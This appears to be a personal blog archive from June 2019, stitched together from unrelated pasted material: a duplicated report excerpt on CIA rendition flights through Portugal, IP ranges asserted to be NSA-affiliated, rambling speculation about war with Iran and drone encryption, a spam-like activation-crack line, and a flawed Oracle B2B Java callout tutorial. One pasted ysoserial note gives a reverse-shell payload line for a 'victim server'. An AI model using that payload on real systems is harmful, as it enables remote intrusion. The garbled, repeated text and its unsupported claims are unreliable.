Sunday, June 30, 2019
Saturday, June 29, 2019
Portugal intel folder
Portugal has permitted use of its airspace and airports for flights associated with CIA extraordinary rendition operations.1377
A 2006 Council of Europe report found that Portugal, among other countries, was used for “stopovers” for flights involving the unlawful transfer of detainees.1378 A February 2007 European Parliament report further noted that CIA planes associated with extraordinary renditions made 91 stopovers in Portugal, that “the aircraft involved in the rendition of Maher Arar and Abou Elkassim Britel made stopovers in Portugal on their return flights,” and that “aircraft from a number of countries, travelling to or from Guantánamo, made 17 stopovers (including three contained in Eurocontrol lists) at the Portuguese airports of Lajes and Santa Maria between 11 January 2002 and 24 June 2006.”1379 The European Parliament report“ask[ed] the Portuguese authorities to investigate the case of Abdurahman Khadr allegedly carried on board the Gulfstream IV N85VM from Guantánamo to Tuzla in Bosnia and Herzegovina on 6 November 2003, with a stopover in Santa Mariaon the Azores Islands on 7 November 2003. The NGO Reprieve has identified at least 115 suspected stopovers between 2001 and 2006 by aircraft associated with the CIA.1381 It further identified at least six known extraordinary renditions of ghost prisoners that were facilitated througPortuguese jurisdiction, including those of Muhammad Farag Ahmed Bashmilah, Salah Nasser Salim Ali Qaru (Marwan al-Adeni), Hassan bin Attash, Maher Arar, Abou Elkassim Britel, and unidentified ghost prisoners extraordinarily renderedthrough the island of Diego Garcia.1382 Documents filed in connection with a lawsuit against Jeppesen Dataplan (a company that provided logistical support for CIA extraordinary rendition flights) also show that Portugal allowed use of its airports and airspace for extraordinary rendition flights operated by the CIA.1383 In addition, during 2003 and 2004, Portugal also allowed use of its airports and airspace for at least five flights operated by Richmor Aviation, a company that operated CIA extraordinary rendition flights.1384 These include flight N85VM that stopped in Santa Maria Azores at some point between November 6 and 7, 2003; N982RK that stopped in Santa Maria Azores between July 15 and 19, 2004; N85VM that stopped in Santa Maria Azores between July 25 and 29, 2004; N85VM that stopped in Santa Maria Azores between July 30 and August 3, 2004; and N70HS that stopped in Santa Maria between November 9 and 12, 2004.
A 2006 Council of Europe report found that Portugal, among other countries, was used for “stopovers” for flights involving the unlawful transfer of detainees.1378 A February 2007 European Parliament report further noted that CIA planes associated with extraordinary renditions made 91 stopovers in Portugal, that “the aircraft involved in the rendition of Maher Arar and Abou Elkassim Britel made stopovers in Portugal on their return flights,” and that “aircraft from a number of countries, travelling to or from Guantánamo, made 17 stopovers (including three contained in Eurocontrol lists) at the Portuguese airports of Lajes and Santa Maria between 11 January 2002 and 24 June 2006.”1379 The European Parliament report“ask[ed] the Portuguese authorities to investigate the case of Abdurahman Khadr allegedly carried on board the Gulfstream IV N85VM from Guantánamo to Tuzla in Bosnia and Herzegovina on 6 November 2003, with a stopover in Santa Mariaon the Azores Islands on 7 November 2003. The NGO Reprieve has identified at least 115 suspected stopovers between 2001 and 2006 by aircraft associated with the CIA.1381 It further identified at least six known extraordinary renditions of ghost prisoners that were facilitated througPortuguese jurisdiction, including those of Muhammad Farag Ahmed Bashmilah, Salah Nasser Salim Ali Qaru (Marwan al-Adeni), Hassan bin Attash, Maher Arar, Abou Elkassim Britel, and unidentified ghost prisoners extraordinarily renderedthrough the island of Diego Garcia.1382 Documents filed in connection with a lawsuit against Jeppesen Dataplan (a company that provided logistical support for CIA extraordinary rendition flights) also show that Portugal allowed use of its airports and airspace for extraordinary rendition flights operated by the CIA.1383 In addition, during 2003 and 2004, Portugal also allowed use of its airports and airspace for at least five flights operated by Richmor Aviation, a company that operated CIA extraordinary rendition flights.1384 These include flight N85VM that stopped in Santa Maria Azores at some point between November 6 and 7, 2003; N982RK that stopped in Santa Maria Azores between July 15 and 19, 2004; N85VM that stopped in Santa Maria Azores between July 25 and 29, 2004; N85VM that stopped in Santa Maria Azores between July 30 and August 3, 2004; and N70HS that stopped in Santa Maria between November 9 and 12, 2004.
Friday, June 28, 2019
Thursday, June 27, 2019
Recently I'm seeing access attempts by servers belonging to The Shadow Server Foundation to mDNSResponder (via Little Snitch actually). I got access attempts from 184.105.247.199, 184.105.247.227 and 184.105.247.207 (hacking folder)
these domain names under "Websites hosted by The Shadow Server Foundation". Among them a few dubious sounding domain names:
- malwr.com
- tvbsp.com
- foottraffix.com
- bilescotrej.com
- make-cash-at-home.com
- profit-case.com
- alfa-cash.com
- milerteddy.com
- sexy-ladies-wantmeet.com
- ladies-with-big-tits.com
SECURITY.STACKEXCHANGE.COM
Update September 2018: The events described below still happen to this day though less often from servers of The Shadow Server Foundation. By now…
NSA ...right here (hacking folder)
Broadnet Portugal
Porto Salvo
TagusPark - Edifício Eastécnica (Porto Salvo),2740-256 Porto Salvo (Oeiras)
Wednesday, June 26, 2019
[NSA-affiliated IP range] Portugal (hacking folder)
Acessos e Redes de Telecomunicacoes, S.A. [NSA-affiliated IP range]
LISBOA (PT) Portugal
213.63.0.0 - 213.63.255.255
dns2.artelecom.pt [213.141.25.226]
dns1.artelecom.pt [213.141.25.225]
LISBOA (PT) Portugal
213.63.0.0 - 213.63.255.255
dns2.artelecom.pt [213.141.25.226]
dns1.artelecom.pt [213.141.25.225]
Tuesday, June 25, 2019
Iran's file
"hello world" tuesday, 09.07 am, welcome back to war! So, everything basicly on the track for war against Iran. Nevertheless, one last chance for ciurgery attack, but not gurantee it will stop iranians reaction. What I have to say, is that, they are of course excepting a conventional warfare of a conventional country, and that's why the iranians want a nuclear bomb...if they wouldn't be conventional, they would be guerrilla...like the vietcongs...which kicked their off, out of there. Non conventional responses, are their ultimate defeat. They occupy Iraq, in 4 days, they weren't execpting 25% of the population to be, radical motherfuckers suiciders...that stall the purpose for long 7 years. Different culture at war, differnt results. But the most important, about conventional warfare, is to look at Hitler's strategy, not only he had superior aviation technology, tactics and encryption...but much more smarter than that, he had a very powerfull navy. And the enemies were not absolutly excepting a continental country, to have such a big investment, on a front of war, that Germany didn't had. One of the reasons, porta aviões, make the US the most powerfull military country. Means, just one thing...they will conduct warfare , into the sea, particluary, on very farway parts of the world, so distant from their own country, they will be assure that they will never be a target. While the russians, usually option, are submarines..as well all their followers, like NK...and also China's approach. We never watched a global conflit, with this technology, to see, who gets the advantage, if submarines would determine, the US defeat, by target their territory, if the US F-35 closed to the enemies, would determinie their victory, over the enemies control rooms.
Pay attention to this reflexion of mine's! the US warfare, primary or secondary, conducted over their private economic interrests...never resulted on big casulties in their own terratory. This means one thing. the USA is still a democracy, for much we all at the west political "systems" keep on saying democacry is dead...one of the reasons, is the technology information on the minute. What would happen, on that case...are the "selfies" all over, shouting.."wait a minute!! one thing is deads far away, watch on the TV...the other thing is right here" Conclusion, public opinion, determines politicians pots, or not. Because, the best part of capitalism, is that its capitalism ruling their pieces of shit politicians, and not politicians running capitalism, and on the other way, capitalism needs employees, expertise..and if they kick their asses, war is over.
Pay attention to this reflexion of mine's! the US warfare, primary or secondary, conducted over their private economic interrests...never resulted on big casulties in their own terratory. This means one thing. the USA is still a democracy, for much we all at the west political "systems" keep on saying democacry is dead...one of the reasons, is the technology information on the minute. What would happen, on that case...are the "selfies" all over, shouting.."wait a minute!! one thing is deads far away, watch on the TV...the other thing is right here" Conclusion, public opinion, determines politicians pots, or not. Because, the best part of capitalism, is that its capitalism ruling their pieces of shit politicians, and not politicians running capitalism, and on the other way, capitalism needs employees, expertise..and if they kick their asses, war is over.
Sunday, June 23, 2019
Saturday, June 22, 2019
estamos a falar, numa frequência de 45 KHZ...precisa-se de 79 KHZ, tem que haver um amplificador à frente...
EBAY.COM
KCASA KC-JK369 Garden Ultrasonic PIR Sensor Solar Animal Dispeller Strong Flashlight Dog Repeller. 1 X KCASA KC-JK369 Ultrasonic Animal Dispeller. Infrared Sensor Angle 110 degrees. Strong Flashing Light Repel raccoon, boar, marten etc.
Friday, June 21, 2019
Iran US drone
"hello world" friday, another weekend, 08.55 am back to war! So, as usual I'm late for the "real media" destinated to the nobodies...What happen with the US drone...was clearly, at the same coordinates, of the vessel attack, which carried some "goods", an equivalent answer. The military intel, having positive ID on a drone, WITH, explosives, strikes and fires..destroying the bird. But, If its considered a recoinassence bird, is simple jammed, to get dwon to the ground. Why, is the so difficult to jamm a drone...(military drones)...bcz, they fly backed up, by 2 covers, a P3 plane giving radio link estabilshiment to the drone and the base, and the "tones" sound communication ...which..it seems "nobodies" knows, that one of the reasons, radio encryption is so hard to decode, its bcz, its made with "tones", that are often mislead by beeing...insects, animals, etc...
ALIBABA.COM
Countering Drone,Anti Uav System,Anti Drone,Portable Anti Uav System,Portable Countering Uav System , Find Complete Details about Countering Drone,Anti Uav System,Anti Drone,Portable Anti Uav System,Portable Countering Uav System,Countering Drones,Portable Anti Uav System,Countering Uav from Securit...
Thursday, June 20, 2019
no war..at this point...just "unknowed" finantial losses
About the 2001 incident with the US spy P3 plane at China. this is the cryto keying suitcase, destroyed and trow to the sea, between the crash and the moment of the seisure, that "saved" the american military inteligence from loosing for the all decade, trillions of dollars...Trump "big mistake" right now...was to say "big mistake" ...if the US did not deny the drone hit, the iranians already gave external power supplly to the motherbaord, not by the anti tampering forcing the motherboard, but just scanning the 3 layers of radio communication, this gives them, ground position , air backup positions for drones search, and tones of encryption, that they will of course, do their best with it! this declaration was a "big mistake" ...and by "mistake" I'm refering to Wall Street
Find oem slic 2 1 activation trick free download
hack microsoft server signature replication update payload hack oem slic 2 1 activation trick free download
source
source
welcome back to war! thursday, 12.46 pm...let's move on Note ysoserial in this extension has been updated to accept more complicated commands that in the original. For instance commands like the following command would fail to execute on the victim server in the original ysoserial application. echo test > /tmp/text.txt or bash -c "echo test > /tmp/text.txt" This is because to run complex commands that pipe command into other commands in java the arguments needs to be a string Array. This version of ysoserial has been modified by using a delimter of ",," to seperate your arguments to the string array. Here is an example of running a more complicated command using this method to get a reverse shell: /bin/bash,,-c,,bash -i >& /dev/tcp/X.X.X.X/9997 0>&1
Note ysoserial in this extension has been updated to accept more complicated commands that in the original. For instance commands like the following command would fail to execute on the victim server in the original ysoserial application.
echo test > /tmp/text.txt or bash -c "echo test > /tmp/text.txt"
This is because to run complex commands that pipe command into other commands in java the arguments needs to be a string Array. This version of ysoserial has been modified by using a delimter of ",," to seperate your arguments to the string array. Here is an example of running a more complicated command using this method to get a reverse shell:
/bin/bash,,-c,,bash -i >& /dev/tcp/X.X.X.X/9997 0>&1
echo test > /tmp/text.txt or bash -c "echo test > /tmp/text.txt"
This is because to run complex commands that pipe command into other commands in java the arguments needs to be a string Array. This version of ysoserial has been modified by using a delimter of ",," to seperate your arguments to the string array. Here is an example of running a more complicated command using this method to get a reverse shell:
/bin/bash,,-c,,bash -i >& /dev/tcp/X.X.X.X/9997 0>&1
GITHUB.COM
YSOSERIAL Integration with burp suite. Contribute to PortSwigger/java-serialized-payloads development by creating an account on GitHub.
Tuesday, June 18, 2019
Monday, June 17, 2019
Oracle B2B Java Callout to intercept incoming ebXML wire messages (hacking folder) BLOGGER editing text sucks....
For our use case we need to intercept an incoming ebXML wire message, and change some part of the wire message itself before processing it in B2B.
Use case description
In this use case we are receiving binary payloads, which are processed incorrectly in Oracle B2B. The incoming ebXML message has the following structure (see figure 1).
Figure 1: ebXML message example
------=_Part_11_1995803378.1472136462013 Content-Type: text/xml;charset=UTF-8 Content-ID: <0> <ebXML envelop…..> ------=_Part_11_1995803378.1472136462013 Content-Type: application/octet-stream Content-Transfer-Encoding: binary Content-ID: <Payload-1> <gzipped file containing payload> ------=_Part_11_1995803378.1472136462013--
Oracle B2B seems to be having problems processing the GZIP payload in the second MIME part of the message. Changing the Content-Type from application/octet-stream to application/gzip will solve the issue, but our trading partner was not planning to perform this change.
Solution
We need to intercept the wire message in B2B and modify the Content-Type value to ‘application/gzip’
Quickly summarized: the message body is retrieved from B2B as a byte array. This ensures the binary stream is processed correctly. Converting to String will cause a character-set conversion which will wreck the binary stream. The ReplacingInputStream private class is used to find and replace a string value within a large bytearray [4].
Figure 9: Java source code for Callout
package nl.qualogy.b2bcallout; import oracle.tip.b2b.callout.Callout; import oracle.tip.b2b.callout.CalloutContext; import oracle.tip.b2b.callout.CalloutMessage; import oracle.tip.b2b.callout.exception.CalloutDomainException; import oracle.tip.b2b.callout.exception.CalloutSystemException; import java.util.*; import java.io.*; public class MyCallout implements Callout { public void execute(CalloutContext arg0, List input, List output) throws CalloutDomainException, CalloutSystemException { try { CalloutMessage cm1 = (CalloutMessage)input.get(0); CalloutMessage cmOut = null; String msg = cm1.getBodyAsString(); byte[] decode = null; decode = cm1.getBodyAsBytes(); byte[] search = "application/octet-stream".getBytes("UTF-8") byte[] replacement = "application/gzip".getBytes("UTF-8"); // Find and replace in bytearray stream ByteArrayInputStream bis = new ByteArrayInputStream(decode ); InputStream ris = new ReplacingInputStream(bis, search, replacement); ByteArrayOutputStream bos = new ByteArrayOutputStream(); int b; while (-1 != (b = ris.read())) bos.write(b); // Use modified byte array as output cmOut = new CalloutMessage(bos.toByteArray()); output.add(cmOut); } catch (Exception e) { System.out.println("Exception: " + e.getMessage() ); } } class ReplacingInputStream extends FilterInputStream { LinkedList<Integer> inQueue = new LinkedList<Integer>(); LinkedList<Integer> outQueue = new LinkedList<Integer>(); final byte[] search, replacement; protected ReplacingInputStream(InputStream in, byte[] search byte[] replacement) { super(in); this.search = search this.replacement = replacement; } private boolean isMatchFound() { Iterator<Integer> inIter = inQueue.iterator(); for (int i = 0; i < search.length; i++ if (!inIter.hasNext() || search[i] != inIter.next()) return false; return true; } private void readAhead() throws IOException { // Work up some look-ahead. while (inQueue.size() < search.length) { int next = super.read(); inQueue.offer(next); if (next == -1) break; } } @Override public int read() throws IOException { // Next byte already determined. if (outQueue.isEmpty()) readAhead(); if (isMatchFound()) { for (int i = 0; i < search.length; i++) inQueue.remove(); for (byte b : replacement) outQueue.offer((int) b); } else outQueue.add(inQueue.remove()); } return outQueue.remove(); } }
Compile, package and load Callout
For compiling the Java callout we need to include the b2b.jar library. For some utility classes you could also consider including the utils.jar.
1) Compiling can be done as shown here:
javac –classpath $MW_HOME/modules/com.bea.core.utils_1.10.0.0.jar: $MW_HOME/soa/soa/modules/oracle.soa.b2b_11.1.1/b2b.jar nl/qualogy/b2bcallout/MyCallout.java
2) Packaging it into a jar file is simply done using:
jar cf MyCallout.jar nl
3) To update Oracle B2B on the fly to use this new callout you can use the following command:
ant -f $MW_HOME/soa/bin/ant-b2b-util.xml b2bupdatecalloutjars -Dpath="/home/oracle/callouts" -Dlibraryname=" MyCallout.jar"
Subscribe to:
Posts (Atom)